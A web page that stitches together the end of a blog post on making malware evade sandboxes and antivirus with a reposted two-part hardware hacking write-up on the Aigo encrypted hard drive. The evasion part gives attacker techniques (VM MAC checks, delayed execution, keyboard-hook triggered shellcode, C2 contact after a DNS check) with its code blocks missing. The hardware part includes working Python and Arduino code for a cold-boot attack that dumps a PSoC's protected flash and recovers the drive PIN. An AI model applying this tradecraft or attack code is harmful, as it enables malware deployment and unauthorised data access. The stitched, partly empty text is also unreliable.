If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging ????

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment’s and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in it’s own sense too.

 

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP for “in-system serial programming protocol”, and is (partially) described in its documentationUS Patent US7185162 also gives some information.

There is also an open source implemention called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is 22 bits long and seem to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much details, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Techical reference manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the VERIFY command. Which failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADDMOV A,XPUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (AXSP and PC).

In the end, the vector’s “dissassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = 0
    write_reg(0xF3, i&0xFF)      # X = 0
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual give us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by substracting consecutive checkums C

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();
  1. It reads the checkum_delay
  2. Starts computing the checkum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Reads the checksum (0xF8 and 0xF9) and the 0xF1 undocumented registers

This, 10 times per 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicrosecondsdoing non-sense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. So make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉

Aigo Chinese encrypted HDD − Part 1: taking it apart

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

Introduction

Analyzing and breaking external encrypted HDD has been a “hobby” of mine for quite some time. With my colleagues Joffrey Czarny and Julien Lenoir we looked at several models in the past:

  • Zalman VE-400
  • Zalman ZM-SHE500
  • Zalman ZM-VE500

Here I am going to detail how I had fun with one drive a colleague gave me: the Chinese Aigo “Patriot” SK8671, which follows the classical design for external encrypted HDDs: a LCD for information diplay and a keyboard to enter the PIN.

DISCLAIMER: This research was done on my personal time and is not related to my employer.

Patriot HDD front view with keyboard Patriot HDD package
Enclosure
Packaging

The user must input a password to access data, which is supposedly encrypted.

Note that the options are very limited:

  • the PIN can be changed by pressing F1 before unlocking
  • the PIN must be between 6 and 9 digits
  • there is a wrong PIN counter, which (I think) destroys data when it reaches 15 tries.

In practice, F2, F3 and F4 are useless.

Hardware design

Of course one of the first things we do is tear down everything to identify the various components.

Removing the case is actually boring, with lots of very small screws and plastic to break.

In the end, we get this (note that I soldered the 5 pins header):

disk

Main PCB

The main PCB is pretty simple:

main PCB

Important parts, from top to bottom:

  • connector to the LCD PCB (CN1)
  • beeper (SP1)
  • Pm25LD010 (datasheet) SPI flash (U2)
  • Jmicron JMS539 (datasheet) USB-SATA controller (U1)
  • USB 3 connector (J1)

The SPI flash stores the JMS539 firmware and some settings.

LCD PCB

The LCD PCB is not really interesting:

LCD view

LCD PCB

It has:

  • an unknown LCD character display (with Chinese fonts probably), with serial control
  • a ribbon connector to the keyboard PCB

Keyboard PCB

Things get more interesting when we start to look at the keyboard PCB:

Keyboard PCB, back

Here, on the back we can see the ribbon connector and a Cypress CY8C21434 PSoC 1 microcontroller (I’ll mostly refer to it as “µC” or “PSoC”):CY8C21434

The CY8C21434 is using the M8C instruction set, which is documented in the Assembly Language User Guide.

The product page states it supports CapSense, Cypress’ technology for capacitive keyboards, the technology in use here.

You can see the header I soldered, which is the standard ISSP programming header.

Following wires

It is always useful to get an idea of what’s connected to what. Here the PCB has rather big connectors and using a multimeter in continuity testing mode is enough to identify the connections:

hand drawn schematic

Some help to read this poorly drawn figure:

  • the PSoC is represented as in the datasheet
  • the next connector on the right is the ISSP header, which thankfully matches what we can find online
  • the right most connector is the clip for the ribbon, still on the keyboard PCB
  • the black square contains a drawing of the CN1 connector from the main PCB, where the cable goes to the LCD PCB. P11, P13 and P4 are linked to the PSoC pins 11, 13 and 4 through the LCD PCB.

Attack steps

Now that we know what are the different parts, the basic steps would be the same as for the drives analyzed in previous research :

  • make sure basic encryption functionnality is there
  • find how the encryption keys are generated / stored
  • find out where the PIN is verified

However, in practice I was not really focused on breaking the security but more on having fun. So, I did the following steps instead:

  • dump the SPI flash content
  • try to dump PSoC flash memory (see part 2)
  • start writing the blog post
  • realize that the communications between the Cypress PSoC and the JMS539 actually contains keyboard presses
  • verify that nothing is stored in the SPI when the password is changed
  • be too lazy to reverse the 8051 firmware of the JMS539
  • TBD: finish analyzing the overall security of the drive (in part 3 ?)

Dumping the SPI flash

Dumping the flash is rather easy:

  • connect probes to the CLKMOSIMISO and (optionally) EN pins of the flash
  • sniff the communications using a logic analyzer (I used a Saleae Logic Pro 16)
  • decode the SPI protocol and export the results in CSV
  • use decode_spi.rb to parse the results and get a dump

Note that this works very well with the JMS539 as it loads its whole firmware from flash at boot time.

$ decode_spi.rb boot_spi1.csv dump
0.039776 : WRITE DISABLE
0.039777 : JEDEC READ ID
0.039784 : ID 0x7f 0x9d 0x21
---------------------
0.039788 : READ @ 0x0
0x12,0x42,0x00,0xd3,0x22,0x00,
[...]
$ ls --size --block-size=1 dump
49152 dump
$ sha1sum dump
3d9db0dde7b4aadd2b7705a46b5d04e1a1f3b125  dump

Unfortunately it does not seem obviously useful as:

  • the content did not change after changing the PIN
  • the flash is actually never accessed after boot

So it probably only holds the firmware for the JMicron controller, which embeds a 8051 microcontroller.

Sniffing communications

One way to find which chip is responsible for what is to check communications for interesting timing/content.

As we know, the USB-SATA controller is connected to the screen and the Cypress µC through the CN1 connector and the two ribbons. So, we hook probes to the 3 relevant pins:

  • P4, generic I/O in the datasheet
  • P11, I²C SCL in the datasheet
  • P13, I²C SDA in the datasheet

probes

We then launch Saleae logic analyzer, set the trigger and enter “123456✓” on the keyboard. Which gives us the following view:

Saleae logic analyzer screenshot

You can see 3 differents types of communications:

  • on the P4 channel, some short bursts
  • on P11 and P13, almost continuous exchanges

Zooming on the first P4 burst (blue rectangle in previous picture), we get this :

P4 zoom

You can see here that P4 is almost 70ms of pure regular signal, which could be a clock. However, after spending some time making sense of this, I realized that it was actually a signal for the “beep” that goes off every time a key is touched… So it is not very useful in itself, however, it is a good marker to know when a keypress was registered by the PSoC.

However, we have on extra “beep” in the first picture, which is slightly different: the sound for “wrong pin” !

Going back to our keypresses, when zooming at the end of the beep (see the blue rectangle again), we get:end of beep zoom

Where we have a regular pattern, with a (probable) clock on P11 and data on P13. Note how the pattern changes after the end of the beep. It could be interesting to see what’s going on here.

2-wires protocols are usually SPI or I²C, and the Cypress datasheet says the pins correspond to I²C, which is apparently the case:i2c decoding of '1' keypress

The USB-SATA chipset constantly polls the PSoC to read the key state, which is ‘0’ by default. It then changes to ‘1’ when key ‘1’ was pressed.

The final communication, right after pressing “✓”, is different if a valid PIN is entered. However, for now I have not checked what the actual transmission is and it does not seem that an encryption key is transmitted.

Anyway, see part 2 to read how I did dump the PSoC internal flash.